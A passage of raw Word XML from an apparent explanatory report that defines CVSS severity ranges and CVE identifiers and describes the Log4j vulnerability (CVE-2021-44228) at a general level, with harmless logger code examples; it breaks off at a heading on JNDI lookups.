          <w:p w14:paraId="2F0C5F67" w14:textId="6FAA3105" w:rsidR="00B22B73" w:rsidRDefault="008171AA" w:rsidP="00CE57CD">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B22B73" w14:paraId="2290FFF8" w14:textId="77777777" w:rsidTr="00B22B73">
        <w:trPr>
          <w:trHeight w:val="273"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A8E5757" w14:textId="6D7C5ECA" w:rsidR="00B22B73" w:rsidRDefault="008171AA" w:rsidP="00CE57CD">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>7.0 – 8.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61B97381" w14:textId="7D0C0300" w:rsidR="00B22B73" w:rsidRDefault="008171AA" w:rsidP="00CE57CD">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B22B73" w14:paraId="7A2993E4" w14:textId="77777777" w:rsidTr="00B22B73">
        <w:trPr>
          <w:trHeight w:val="273"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FB89A59" w14:textId="0B32E01D" w:rsidR="00B22B73" w:rsidRDefault="008171AA" w:rsidP="00CE57CD">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>9.0 – 10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58060639" w14:textId="235F481D" w:rsidR="00B22B73" w:rsidRDefault="008171AA" w:rsidP="00CE57CD">
            <w:pPr>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ja-JP"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37D442E8" w14:textId="455FC7C5" w:rsidR="00B22B73" w:rsidRDefault="00B22B73" w:rsidP="003249C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37320CC9" w14:textId="2B6CB7F1" w:rsidR="00127FEC" w:rsidRPr="00127FEC" w:rsidRDefault="003249C5" w:rsidP="00127FEC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00127FEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidR="00127FEC" w:rsidRPr="00127FEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067FAA56" w14:textId="75D27CBF" w:rsidR="003249C5" w:rsidRDefault="003249C5" w:rsidP="003249C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Common Vulnerability Enu</w:t>
      </w:r>
      <w:r w:rsidR="00127FEC">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">meration (CVE) is an unique identifier for each vulnerability listed in the </w:t>
      </w:r>
      <w:r w:rsidR="00096A8F">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">NIST </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00096A8F">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>NVD(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00096A8F">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00096A8F">
        <w:instrText xml:space="preserve"> HYPERLINK "https://nvd.nist.gov/" </w:instrText>
      </w:r>
      <w:r w:rsidR="00096A8F">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00096A8F">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>NVD - Home (nist.gov)</w:t>
      </w:r>
      <w:r w:rsidR="00096A8F">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00096A8F">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00FC09ED">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2708982F" w14:textId="2C4576A4" w:rsidR="00FC09ED" w:rsidRDefault="00FC09ED" w:rsidP="003249C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>CVE format is, CVE</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00E92477">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>4 Digit Year</w:t>
      </w:r>
      <w:r w:rsidR="00E92477">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>}-{Sequential Identifier}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE52CEB" w14:textId="061BD716" w:rsidR="00E92477" w:rsidRDefault="00B21C4D" w:rsidP="00B21C4D">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC0417">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CF638C" w14:textId="550AD2F5" w:rsidR="00B21C4D" w:rsidRDefault="00B21C4D" w:rsidP="00BE3A11">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Heartbleed Vulnerability – CVE-2014-0160</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4BDFB7" w14:textId="61651374" w:rsidR="00F153FD" w:rsidRDefault="00F153FD" w:rsidP="003249C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Struts Vulnerability – CVE-2017</w:t>
      </w:r>
      <w:r w:rsidR="00E12455">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>-5638, CVE-2016-3082</w:t>
      </w:r>
      <w:r w:rsidR="00245441">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>, CVE-2013-4316</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A904FA" w14:textId="77777777" w:rsidR="00980D50" w:rsidRPr="003A290F" w:rsidRDefault="00980D50" w:rsidP="00980D50">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc126223996"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Why Log4J vulnerability is important?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidRPr="003A290F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA82539" w14:textId="739EC08E" w:rsidR="00980D50" w:rsidRDefault="00C142F1" w:rsidP="003249C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C142F1">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Have we ever seen any technology issues in Time magazine? However, the Log4j vulnerability was in the news</w:t>
      </w:r>
      <w:r w:rsidR="00946BF5">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> head</w:t>
      </w:r>
      <w:r w:rsidR="00F26F59">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>line</w:t>
      </w:r>
      <w:r w:rsidRPr="00C142F1">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>, and Time magazine published an article about it. Log4j was discovered in over 3 million vulnerable instances. The researchers also discovered nearly 68,000 vulnerabilities in cloud workloads and containers across the US and EMEA, reinforcing the recommendation that businesses monitor running containers for flaws such as Log4j.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4DF6B5" w14:textId="1B7770B0" w:rsidR="00DC7853" w:rsidRDefault="00DC7853" w:rsidP="003249C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7853">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Since this vulnerability is simple to exploit, there has been a lot of reconnaissance and attempted exploits. Between December 9 and December 21, 2021, Symantec's intrusion detection system detected and blocked over 93 million Log4j-related exploitation attempts on over 270,000 unique machines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242E2657" w14:textId="4EA93C4D" w:rsidR="0040634C" w:rsidRDefault="0040634C" w:rsidP="003249C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040634C">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The Log4j vulnerability is a highly significant RCE (Remote Code Execution) vulnerability that enables an attacker to infiltrate a target system with malware or ransomware. As a result, the network may become totally compromised, sensitive data may be stolen, and as well as the possibility of sabotage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325379A4" w14:textId="1F329D4D" w:rsidR="005E0942" w:rsidRPr="003A290F" w:rsidRDefault="005E0942" w:rsidP="005E0942">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc126223997"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Log4J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00656872">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidRPr="003A290F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476E52D5" w14:textId="5679DB6E" w:rsidR="005E0942" w:rsidRDefault="00EE6618" w:rsidP="005E0942">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="0079087E">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>CVE-2021-44</w:t>
      </w:r>
      <w:r w:rsidR="003F2A38">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>228</w:t>
      </w:r>
      <w:r w:rsidR="0079087E">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE6618">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Log4j2 JNDI features do not protect against </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE6618">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>attacker-controlled</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE6618">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> LDAP and other JNDI related endpoints. Log4j2 allows Lookup expressions in the data being logged exposing the JNDI vulnerability, as well as other problems, to be exploited by end users whose input is being logged.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE3FF7A" w14:textId="473E2638" w:rsidR="00E96D42" w:rsidRDefault="00BF269A" w:rsidP="00BF269A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="364D012B" wp14:editId="2346DB1A">
            <wp:extent cx="5731510" cy="1172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2210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0B1236" w14:textId="5B98DBF5" w:rsidR="009B1DCF" w:rsidRPr="003A290F" w:rsidRDefault="00623017" w:rsidP="009B1DCF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc126223998"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Log4j </w:t>
      </w:r>
      <w:r w:rsidR="009B1DCF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Use case</w:t>
      </w:r>
      <w:r w:rsidR="002310C3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>s:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidR="009B1DCF" w:rsidRPr="003A290F">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4339844D" w14:textId="33AD591C" w:rsidR="007D59ED" w:rsidRPr="00316669" w:rsidRDefault="007D59ED" w:rsidP="007D59ED">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00316669">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Feature-1: Logs Expressions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F5D227" w14:textId="4B2A204B" w:rsidR="008B5468" w:rsidRPr="005C09CA" w:rsidRDefault="008B5468" w:rsidP="005C09CA">
      <w:pPr>
        <w:spacing w:before="240"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="00F55DB5" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">inal Logger </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F55DB5" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>logger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F55DB5" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F55DB5" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>LogManager.getLogger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F55DB5" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B15E0" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>HelloWorld</w:t>
      </w:r>
      <w:r w:rsidR="00CF0A1A" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>.class</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CF0A1A" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2A25C58C" w14:textId="2655B55C" w:rsidR="009A2BB8" w:rsidRPr="005C09CA" w:rsidRDefault="009A2BB8" w:rsidP="005C09CA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>logger.error</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>(“</w:t>
      </w:r>
      <w:r w:rsidR="00460572" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Error Message: {}</w:t>
      </w:r>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00460572" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00460572" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>error.getMessage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00460572" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411B4757" w14:textId="213F9470" w:rsidR="002134BE" w:rsidRDefault="002134BE" w:rsidP="005C09CA">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>logger.info(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">“User {} has </w:t>
      </w:r>
      <w:r w:rsidR="002100EC" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>logged with user id {}</w:t>
      </w:r>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="002100EC" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C24AEF" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C24AEF" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>map.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C24AEF" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">(“Name”), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C24AEF" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>user.getUserId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C24AEF" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00C24AEF" w:rsidRPr="005C09CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB919B4" w14:textId="0B38D378" w:rsidR="00DE0C99" w:rsidRDefault="00DE0C99" w:rsidP="005E0942">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B4CD3">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Since we are giving in expressions and the value itself, this use case is straightforward and simple to comprehend. There is nothing unique about this logging; it is usual.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1551E0" w14:textId="3AECF683" w:rsidR="004D5DE3" w:rsidRPr="00316669" w:rsidRDefault="004D5DE3" w:rsidP="00E0624E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00316669">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Feature-2: JNDI</w:t>
      </w:r>
      <w:r w:rsidR="00873F63" w:rsidRPr="00316669">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> look</w:t>
      </w:r>
